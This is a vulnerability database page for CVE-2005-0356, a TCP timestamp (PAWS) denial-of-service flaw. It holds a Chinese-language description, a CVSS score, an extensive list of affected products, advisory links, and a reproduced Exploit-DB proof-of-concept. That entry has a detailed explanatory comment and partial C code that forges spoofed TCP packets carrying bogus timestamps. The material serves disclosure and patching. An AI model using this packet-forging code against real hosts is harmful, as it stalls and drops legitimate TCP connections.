CVE-2005-0356
CVSS5.0
发布时间 :2005-05-31 00:00:00
修订时间 :2008-09-05 16:46:02
NMCOES    

[原文]Multiple TCP implementations with Protection Against Wrapped Sequence Numbers (PAWS) with the timestamps option enabled allow remote attackers to cause a denial of service (connection loss) via a spoofed packet with a large timer value, which causes the host to discard later packets because they appear to be too old.


[CNNVD]多家厂商的TCP/IP协议栈实现时间戳PAWS远程拒绝服务漏洞(CNNVD-200505-1247)

        RFC 793中定义的传输控制协议(TCP)允许在报文交换网络中进行可靠的主机到主机的传输。RFC 1323引入了一些增强TCP性能的技术,其中两项技术是TCP时间戳和序列号回卷保护(PAWS)。
        TCP RFC 1323的PAWS技术中存在安全漏洞。如果启用了TCP时间戳的话,TCP连接的两个端点使用内部时钟用时间戳的值标记TCP首部。如果TCP PAWS配置为使用时间戳值的话,TCP PAWS实现中就会存在拒绝服务漏洞。
        如果攻击者向有漏洞的计算机发送了足够多的TCP PAWS报文的话会出现这个漏洞。攻击者可以将报文时间戳设为很大的值。目标机器在处理这个报文时,内部计时器就会更新到这个值,这可能导致丢掉所有之后收到的有效报文,因为这些报文被认定为太旧了或无效。这种技术可能导致目标连接拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:5.1FreeBSD 5.1
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/a:f5:big-ip:9.0.2
cpe:/o:cisco:content_services_switch_11500:7.10_%2805.07%29s
cpe:/o:cisco:sn_5420_storage_router:1.1%284%29
cpe:/o:freebsd:freebsd:5.0FreeBSD 5.0
cpe:/h:cisco:unity_server:4.0Cisco Unity Server 4.0
cpe:/a:f5:big-ip:4.5.6
cpe:/a:nortel:callpilot:703t
cpe:/h:nortel:7250_wlan_access_pointNortel WLAN Access Point 7250.0
cpe:/h:hitachi:gr3000
cpe:/o:microsoft:windows_2000:::professional
cpe:/a:cisco:secure_access_control_server:3.2%282%29
cpe:/o:cisco:sn_5428_storage_router:3.2.1-k9Cisco Storage Router SN5428 3.2.1-K9
cpe:/h:cisco:sn_5420_storage_routerCisco SN 5420 Storage Router
cpe:/o:freebsd:freebsd:3.0:releng
cpe:/o:openbsd:openbsd:3.1OpenBSD 3.1
cpe:/a:cisco:e-mail_managerCisco E-Mail Manager
cpe:/o:microsoft:windows_xp:::home
cpe:/a:cisco:personal_assistant:1.3%281%29Cisco Personal Assistant 1.3 (1)
cpe:/h:nortel:succession_communication_server_1000Nortel Succession Communications Server 1000
cpe:/o:freebsd:freebsd:2.2.3FreeBSD 2.2.3
cpe:/o:freebsd:freebsd:5.2FreeBSD 5.2
cpe:/h:cisco:unity_server:3.1Cisco Unity Server 3.1
cpe:/h:cisco:call_manager:2.0Cisco Call Manager 2.0
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/a:cisco:ciscoworks_access_control_list_manager:1.5Cisco CiscoWorks Access Control List Manager 1.5
cpe:/a:cisco:secure_access_control_server:3.0
cpe:/o:freebsd:freebsd:4.9FreeBSD 4.9
cpe:/a:cisco:personal_assistant:1.4%281%29Cisco Personal Assistant 1.4(1)
cpe:/o:freebsd:freebsd:2.1.6.1FreeBSD 2.1.6.1
cpe:/o:freebsd:freebsd:4.0:releng
cpe:/h:cisco:call_manager:4.0Cisco Call Manager 4.0
cpe:/a:cisco:secure_access_control_server:3.0.3::windows_nt
cpe:/o:freebsd:freebsd:4.5:release_p32
cpe:/h:alaxala:alaxala_networks:ax7800r
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/a:cisco:personal_assistant:1.4%282%29Cisco Personal Assistant 1.4(2)
cpe:/h:cisco:call_manager:3.1%282%29Cisco Call Manager 3.1.2
cpe:/a:cisco:ciscoworks_access_control_list_manager:1.6Cisco CiscoWorks Access Control List Manager 1.6
cpe:/h:cisco:unity_server:2.0Cisco Unity Server 2.0
cpe:/o:cisco:sn_5428_storage_router:3.2.2-k9Cisco Storage Router SN5428 3.2.2-K9
cpe:/o:freebsd:freebsd:5.0:release_p14
cpe:/a:f5:big-ip:4.4
cpe:/a:hitachi:alaxala:ax
cpe:/a:f5:big-ip:4.3
cpe:/h:nortel:7220_wlan_access_pointNortel WLAN Access Point 7220.0
cpe:/a:cisco:secure_access_control_server:2.4::windows_nt
cpe:/a:cisco:secure_access_control_server:2.3.6.1::unix
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:cisco:sn_5428_storage_router:3.3.2-k9Cisco Storage Router SN5428 3.3.2-K9
cpe:/a:f5:big-ip:4.6.2
cpe:/a:cisco:ciscoworks_vpn_security_management_solutionCisco CiscoWorks VPN_Security Management Solution
cpe:/h:cisco:content_services_switch_11503Cisco Content Services Switch CSS11503
cpe:/o:cisco:conference_connection:1.2Cisco Conference Connection 1.2
cpe:/o:freebsd:freebsd:5.1:releng
cpe:/a:f5:big-ip:4.5.11
cpe:/a:cisco:interactive_voice_response
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/h:yamaha:rtx1100
cpe:/h:cisco:call_manager:3.1%283a%29Cisco Call Manager 3.1.3a
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:freebsd:freebsd:4.9:releng
cpe:/h:alaxala:alaxala_networks:ax7800s
cpe:/a:cisco:ciscoworks_common_management_foundation:2.2Cisco CiscoWorks Common Management Foundation 2.2
cpe:/o:freebsd:freebsd:4.10FreeBSD 4.10
cpe:/a:cisco:ip_contact_center_enterpriseCisco IP Contact Center Enterprise
cpe:/a:cisco:ciscoworks_windowsCisco CiscoWorks Windows
cpe:/o:cisco:sn_5420_storage_router:1.1%283%29
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:cisco:sn_5428_storage_router:2-3.3.1-k9Cisco Storage Router SN5428 2-3.3.1-K9
cpe:/a:cisco:agent_desktopCisco Agent Desktop
cpe:/h:cisco:call_manager:1.0Cisco Call Manager 1.0
cpe:/a:cisco:secure_access_control_server:2.3::unix
cpe:/a:cisco:secure_access_control_server:3.3
cpe:/h:yamaha:rtx2000
cpe:/o:freebsd:freebsd:4.8:release_p6
cpe:/a:nortel:callpilot:200i
cpe:/a:cisco:secure_access_control_server:3.0.1::windows_nt
cpe:/h:yamaha:rtx1000
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:cisco:content_services_switch_11500:7.30_%2800.08%29s
cpe:/a:f5:big-ip:4.5.10
cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/a:cisco:secure_access_control_server:2.6.2::windows_nt
cpe:/a:cisco:secure_access_control_server:3.2%281.20%29
cpe:/o:freebsd:freebsd:3.5.1FreeBSD 3.5.1
cpe:/h:cisco:aironet_ap350Cisco Aironet 350 IOS
cpe:/o:freebsd:freebsd:4.11:release_p3
cpe:/h:cisco:content_services_switch_11506Cisco Content Services Switch CSS11506
cpe:/h:hitachi:gs4000
cpe:/h:cisco:unity_server:2.2Cisco Unity Server 2.2
cpe:/a:cisco:secure_access_control_server:3.2%283%29
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:freebsd:freebsd:4.7:release_p17
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:freebsd:freebsd:5.3:releng
cpe:/o:freebsd:freebsd:5.1:release
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:freebsd:freebsd:4.4:release_p42
cpe:/h:yamaha:rtx1500
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:cisco:ciscoworks_cd1:4th
cpe:/a:cisco:secure_access_control_server:2.6.4::windows_nt
cpe:/h:nortel:ethernet_routing_switch_1624Nortel Ethernet Routing Switch 1624
cpe:/o:freebsd:freebsd:5.1:alpha
cpe:/o:cisco:sn_5428_storage_router:2.5.1-k9Cisco Storage Router SN5428 2.5.1-K9
cpe:/o:cisco:sn_5420_storage_router:1.1.3
cpe:/h:nortel:optical_metro_5100Nortel Optical Metro 5100
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000:::server
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/o:microsoft:windows_xp:::embedded
cpe:/a:nortel:business_communications_manager:400
cpe:/a:cisco:secure_access_control_server:3.2::windows_server
cpe:/h:cisco:call_manager:3.3Cisco Call Manager 3.3
cpe:/o:cisco:ciscoworks_cd1:1st
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/o:openbsd:openbsd:3.3OpenBSD 3.3
cpe:/a:cisco:secure_access_control_server:3.2.2
cpe:/o:freebsd:freebsd:4.10:releng
cpe:/o:cisco:content_services_switch_11500:7.30_%2800.09%29s
cpe:/a:cisco:secure_access_control_server:2.6.3::windows_nt
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/a:cisco:secure_access_control_server:3.2
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3.1
cpe:/a:nortel:contact_centerNortel Conact Center
cpe:/a:cisco:secure_access_control_server:2.3.5.1::unix
cpe:/o:cisco:content_services_switch_11500:7.20_%2803.09%29s
cpe:/o:cisco:sn_5428_storage_router:3.3.1-k9Cisco Storage Router SN5428 3.3.1-K9
cpe:/a:cisco:personal_assistant:1.3%284%29Cisco Personal Assistant 1.3 (4)
cpe:/o:cisco:mgx_8230:1.2.11Cisco MGX 8230 1.2.11
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:cisco:mgx_8230:1.2.10Cisco MGX 8230 1.2.10
cpe:/h:hitachi:gr4000
cpe:/o:freebsd:freebsd:5.0:releng
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:5.3:release
cpe:/a:nortel:callpilot:201i
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/a:cisco:secure_access_control_server:3.1.1::windows_nt
cpe:/h:yamaha:rtv700
cpe:/a:cisco:secure_access_control_server:3.3%281%29
cpe:/o:cisco:ciscoworks_cd1:3rd
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/a:f5:big-ip:9.0.1
cpe:/a:f5:big-ip:4.5.9
cpe:/h:nortel:universal_signaling_point:5200
cpe:/o:cisco:ciscoworks_cd1:5th
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/h:yamaha:rt300i
cpe:/a:f5:big-ip:4.5
cpe:/o:openbsd:openbsd:3.0OpenBSD 3.0
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:freebsd:freebsd:4.6.2FreeBSD 4.6.2
cpe:/a:cisco:ciscoworks_common_management_foundation:2.0Cisco CiscoWorks Common Management Foundation 2.0
cpe:/h:cisco:unity_server:2.4Cisco Unity Server 2.4
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/a:f5:big-ip:4.5.12
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:freebsd:freebsd:2.2.4FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/a:f5:big-ip:9.0.5
cpe:/a:cisco:secure_access_control_server:2.1::windows_nt
cpe:/o:cisco:mgx_8250:1.2.10Cisco MGX 8250 1.2.10
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:freebsd:freebsd:4.7:releng
cpe:/a:nortel:business_communications_manager:1000
cpe:/a:cisco:personal_assistant:1.3%283%29Cisco Personal Assistant 1.3 (3)
cpe:/o:cisco:ciscoworks_1105_wireless_lan_solution_engineCisco CiscoWorks 1105 Wireless LAN Solution Engine
cpe:/h:nortel:optical_metro_5200Nortel Optical Metro 5200
cpe:/o:freebsd:freebsd:4.3:release_p38
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/a:f5:big-ip:9.0
cpe:/o:freebsd:freebsd:2.2FreeBSD 2.2
cpe:/h:nortel:ethernet_routing_switch_1612Nortel Ethernet Routing Switch 1612
cpe:/o:freebsd:freebsd:5.4:release
cpe:/a:cisco:ciscoworks_common_management_foundation:2.1Cisco CiscoWorks Common Management Foundation 2.1
cpe:/o:openbsd:openbsd:3.4OpenBSD 3.4
cpe:/a:cisco:personal_assistant:1.3%282%29Cisco Personal Assistant 1.3 (2)
cpe:/a:cisco:meetingplaceCisco MeetingPlace
cpe:/a:f5:big-ip:4.2
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/h:cisco:aironet_ap1200Cisco Aironet 1200
cpe:/o:cisco:sn_5420_storage_router:1.1%282%29
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/a:cisco:remote_monitoring_suite_optionCisco Remote Monitoring Suite Option
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:release
cpe:/a:nortel:business_communications_manager:200
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:freebsd:freebsd:4.7:release
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.3:release
cpe:/h:nortel:universal_signaling_point:compact_lite
cpe:/o:cisco:conference_connection:1.1%281%29Cisco Conference Connection 1.1 (1)
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/h:yamaha:rt105
cpe:/o:cisco:sn_5428_storage_router:2-3.3.2-k9Cisco Storage Router SN5428 2-3.3.2-K9
cpe:/o:freebsd:freebsd:3.4FreeBSD 3.4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/a:cisco:secure_access_control_server:2.5::windows_nt
cpe:/h:cisco:content_services_switch_11150Cisco Cisco Content Services 11150
cpe:/a:f5:big-ip:4.6
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3.2
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:f5:big-ip:4.0
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:freebsd:freebsd:4.8FreeBSD 4.8
cpe:/o:cisco:ciscoworks_1105_hosting_solution_engineCisco CiscoWorks 1105 Hosting Solution Engine
cpe:/h:cisco:unity_server:3.2Cisco Unity Server 3.2
cpe:/h:cisco:unity_server:2.3Cisco Unity Server 2.3
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.8:releng
cpe:/o:cisco:ciscoworks_windows_wugCisco CiscoWorks Windows_WUG
cpe:/h:yamaha:rt57i
cpe:/o:openbsd:openbsd:3.2OpenBSD 3.2
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:openbsd:openbsd:3.5OpenBSD 3.5
cpe:/a:f5:big-ip:9.0.4
cpe:/a:cisco:secure_access_control_server:3.0::windows_nt
cpe:/a:cisco:support_toolsCisco Support Tools
cpe:/a:cisco:secure_access_control_server:3.3.1
cpe:/h:cisco:call_manager:3.1Cisco Call Manager 3.1
cpe:/o:cisco:sn_5420_storage_router:1.1%285%29
cpe:/o:freebsd:freebsd:5.2.1:release
cpe:/o:freebsd:freebsd:4.9:pre-release
cpe:/h:cisco:call_manager:3.2Cisco Call Manager 3.2
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/h:cisco:content_services_switch_11800Cisco Cisco Content Services 11800
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/a:cisco:secure_access_control_server:3.3.2
cpe:/o:freebsd:freebsd:4.11:releng
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/h:cisco:unity_server:3.3Cisco Unity Server 3.3
cpe:/a:cisco:secure_access_control_server:3.2.1
cpe:/h:nortel:ethernet_routing_switch_1648Nortel Ethernet Routing Switch 1648
cpe:/a:nortel:callpilot:702t
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:freebsd:freebsd:4.10:release
cpe:/h:yamaha:rt250i
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:freebsd:freebsd:4.11:stable
cpe:/o:freebsd:freebsd:5.4:pre-release
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:5.3FreeBSD 5.3
cpe:/h:cisco:unity_server:3.0Cisco Unity Server 3.0
cpe:/o:cisco:content_services_switch_11500:7.20_%2803.10%29s
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/a:cisco:secure_access_control_server:3.2%281%29
cpe:/o:freebsd:freebsd:4.6:releng
cpe:/a:cisco:ciscoworks_lms:1.3Cisco CiscoWorks LMS 1.3
cpe:/o:cisco:mgx_8250:1.2.11Cisco MGX 8250 1.2.11
cpe:/h:nortel:survivable_remote_gateway:1.0Nortel SRG 1.0
cpe:/o:freebsd:freebsd:4.10:release_p8
cpe:/o:cisco:ciscoworks_cd1:2nd
cpe:/h:cisco:unity_server:2.46Cisco Unity Server 2.46
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:1.1.5.1FreeBSD 1.1.5.1
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/a:cisco:intelligent_contact_manager:5.0Cisco Intelligent Contact Manager 5.0
cpe:/a:cisco:secure_access_control_server:3.1
cpe:/o:freebsd:freebsd:2.1.7.1FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:5.1:release_p5
cpe:/h:cisco:unity_server:2.1Cisco Unity Server 2.1
cpe:/h:alaxala:alaxala_networks:ax5400s
cpe:/a:cisco:secure_access_control_server:2.0::unix
cpe:/a:cisco:ip_contact_center_expressCisco IP Contact Center Express
cpe:/h:nortel:optical_metro_5000Nortel Optical Metro 5000
cpe:/h:cisco:content_services_switch_11500Cisco Content Service Switch 11500
cpe:/h:cisco:content_services_switch_11000Cisco Content Service 11000
cpe:/o:freebsd:freebsd:5.3:stable
cpe:/a:cisco:web_collaboration_optionCisco Web Collaboration Option
cpe:/h:cisco:content_services_switch_11501Cisco Content Services Switch CSS11501
cpe:/o:freebsd:freebsd:4.6:release_p20
cpe:/a:cisco:secure_access_control_server:2.6::windows_nt
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/a:cisco:ciscoworks_common_services:2.2Cisco CiscoWorks Common Services 2.2
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:freebsd:freebsd:4.5:releng
cpe:/o:openbsd:openbsd:3.6OpenBSD 3.6
cpe:/h:cisco:content_services_switch_11050Cisco Cisco Content Services 11050
cpe:/a:cisco:emergency_responder:1.1Cisco Emergency Responder 1.1
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1
cpe:/o:cisco:sn_5420_storage_router:1.1%287%29
cpe:/o:microsoft:windows_xp::sp1:embeddedMicrosoft windows xp_sp1 embedded
cpe:/o:microsoft:windows_2003_server:web
cpe:/a:f5:big-ip:9.0.3
cpe:/a:cisco:secure_access_control_server:2.42::windows_nt
cpe:/o:freebsd:freebsd:5.2.1:releng
cpe:/h:cisco:call_manager:3.0Cisco Call Manager 3.0
cpe:/o:freebsd:freebsd:3.3FreeBSD 3.3
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/h:cisco:call_manager:3.3%283%29Cisco Call Manager 3.3.3
cpe:/a:cisco:secure_access_control_server:2.3::windows_nt

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0356
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0356
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1247
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/637934
(VENDOR_ADVISORY)  CERT-VN  VU#637934
http://secunia.com/advisories/15417/
(PATCH)  SECUNIA  15417
http://xforce.iss.net/xforce/xfdb/20635
(UNKNOWN)  XF  tcp-ip-timestamp-dos(20635)
http://www.securityfocus.com/bid/13676
(UNKNOWN)  BID  13676
http://www.cisco.com/warp/public/707/cisco-sn-20050518-tcpts.shtml
(VENDOR_ADVISORY)  CISCO  20050518 Vulnerability in a Variant of the TCP Timestamps Option
http://secunia.com/advisories/15393
(UNKNOWN)  SECUNIA  15393
http://support.avaya.com/elmodocs2/security/ASA-2006-032.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-032.htm
http://secunia.com/advisories/18662
(UNKNOWN)  SECUNIA  18662
http://secunia.com/advisories/18222
(UNKNOWN)  SECUNIA  18222
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.64/SCOSA-2005.64.txt
(UNKNOWN)  SCO  SCOSA-2005.64
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:15.tcp.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-05:15

- 漏洞信息

多家厂商的TCP/IP协议栈实现时间戳PAWS远程拒绝服务漏洞
中危 设计错误
2005-05-31 00:00:00 2005-10-20 00:00:00
远程  
        RFC 793中定义的传输控制协议(TCP)允许在报文交换网络中进行可靠的主机到主机的传输。RFC 1323引入了一些增强TCP性能的技术,其中两项技术是TCP时间戳和序列号回卷保护(PAWS)。
        TCP RFC 1323的PAWS技术中存在安全漏洞。如果启用了TCP时间戳的话,TCP连接的两个端点使用内部时钟用时间戳的值标记TCP首部。如果TCP PAWS配置为使用时间戳值的话,TCP PAWS实现中就会存在拒绝服务漏洞。
        如果攻击者向有漏洞的计算机发送了足够多的TCP PAWS报文的话会出现这个漏洞。攻击者可以将报文时间戳设为很大的值。目标机器在处理这个报文时,内部计时器就会更新到这个值,这可能导致丢掉所有之后收到的有效报文,因为这些报文被认定为太旧了或无效。这种技术可能导致目标连接拒绝服务。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.openbsd.org/security.html

- 漏洞信息 (1008)

TCP TIMESTAMPS Denial of Service Exploit (EDBID:1008)
multiple dos
2005-05-21 Verified
0 Daniel Hartmeier
N/A [点击下载]
/*
* TCP does not adequately validate segments before updating timestamp value
* http://www.kb.cert.org/vuls/id/637934
*
* RFC-1323 (TCP Extensions for High Performance)
*
* 4.2.1 defines how the PAWS algorithm should drop packets with invalid
* timestamp options:
* 
* R1) If there is a Timestamps option in the arriving segment
* and SEG.TSval < TS.Recent and if TS.Recent is valid (see
* later discussion), then treat the arriving segment as not
* acceptable:
*
* Send an acknowledgement in reply as specified in
* RFC-793 page 69 and drop the segment.
*
* 3.4 defines what timestamp options to accept:
*
* (2) If Last.ACK.sent falls within the range of sequence numbers
* of an incoming segment:
*
* SEG.SEQ <= Last.ACK.sent < SEG.SEQ + SEG.LEN
*
* then the TSval from the segment is copied to TS.Recent;
* otherwise, the TSval is ignored.
*
* http://community.roxen.com/developers/idocs/drafts/
* draft-jacobson-tsvwg-1323bis-00.html
*
* 3.4 suggests an slightly different check like
*
* (2) If: SEG.TSval >= TSrecent and SEG.SEQ <= Last.ACK.sent
* then SEG.TSval is copied to TS.Recent; otherwise, it is
* ignored.
*
* and explains this change
*
* APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323
*
* There are additional changes in this document from RFC-1323.
* These changes are:
* (b) In RFC-1323, section 3.4, step (2) of the algorithm to control
* which timestamp is echoed was incorrect in two regards:
* (1) It failed to update TSrecent for a retransmitted segment
* that resulted from a lost ACK.
* (2) It failed if SEG.LEN = 0.
* In the new algorithm, the case of SEG.TSval = TSrecent is
* included for consistency with the PAWS test.
*
* At least OpenBSD and FreeBSD contain this code instead:
*
* sys/netinet/tcp_input.c tcp_input()
*
* **
* * If last ACK falls within this segment's sequence numbers,
* * record its timestamp.
* * NOTE that the test is modified according to the latest
* * proposal of the tcplw@cray.com list (Braden 1993/04/26).
* **
* if ((to.to_flags & TOF_TS) != 0 &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* tp->ts_recent_age = ticks;
* tp->ts_recent = to.to_tsval;
* }
*
* The problem here is that the packet the timestamp is accepted from doesn't
* need to have a valid th_seq or th_ack. This point of execution is reached
* for packets with arbitrary th_ack values and th_seq values of half the
* possible value range, because the first 'if (todrop > tlen)' check in the
* function explicitely continues execution to process ACKs.
*
* If an attacker knows (or guesses) the source and destination addresses and
* ports of a connection between two peers, he can send spoofed TCP packets
* to either peer containing bogus timestamp options. Since half of the
* possible th_seq and timestamp values are accepted, four packets containing
* two random values and their integer wraparound opposites are sufficient to
* get one random timestamp accepted by the receipient. Further packets from
* the real peer will get dropped by PAWS, and the TCP connection stalls and
* times out.
*
* The following change reverts the tcp_input() check back to the implemented
* suggested by draft-jacobson-tsvwg-1323bis-00.txt
*
* if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* + if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +
* + ((tiflags & (TH_SYN|TH_FIN)) != 0)))
* + tp->ts_recent = opti.ts_val;
* + else
* + tp->ts_recent = 0;
* tp->ts_recent_age = tcp_now;
* - tp->ts_recent = opti.ts_val;
* }
*
* I can't find Braden's proposal referenced in the comment. It seems to
* pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by
* it.
*
* Fri Mar 11 02:33:36 MET 2005 Daniel Hartmeier <daniel@benzedrine.cx>
*
* http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.184&r2=1.185&f=h
*
* http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.252.2.15&r2=1.252.2.16&f=h
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <net/if.h>
#ifdef __FreeBSD__
#include <net/if_var.h>
#endif
#include <netinet/in.h>
#include <netinet/in_var.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

static u_int16_t
checksum(u_int16_t *data, u_int16_t length)
{
u_int32_t value = 0;
u_int16_t i;

for (i = 0; i < (length >> 1); ++i)
value += data[i];
if ((length & 1) == 1)
value += (data[i] << 8);
value = (value & 65535) + (value >> 16);
return (~value);
}

static int
send_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,
u_int16_t dport, u_int32_t seq, u_int32_t ts)
{
u_char packet[1600];
struct tcphdr *tcp;
struct ip *ip;
unsigned char *opt;
int optlen, len, r;
struct sockaddr_in sin;

memset(packet, 0, sizeof(packet));

opt = packet + sizeof(struct ip) + sizeof(struct tcphdr);
optlen = 0;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_TIMESTAMP;
opt[optlen++] = 10;
ts = htonl(ts);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);
ts = htonl(0);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);

len = sizeof(struct ip) + sizeof(struct tcphdr) + optlen;

ip = (struct ip *)packet;
ip->ip_src.s_addr = saddr;
ip->ip_dst.s_addr = daddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_len = htons(sizeof(struct tcphdr) + optlen);

tcp = (struct tcphdr *)(packet + sizeof(struct ip));
tcp->th_sport = htons(sport);
tcp->th_dport = htons(dport);
tcp->th_seq = htonl(seq);
tcp->th_ack = 0;
tcp->th_off = (sizeof(struct tcphdr) + optlen) / 4;
tcp->th_flags = 0;
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;

tcp->th_sum = checksum((u_int16_t *)ip, len);

ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = htons(len);
ip->ip_id = htons(arc4random() % 65536);
ip->ip_off = 0;
ip->ip_ttl = 64;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = saddr;

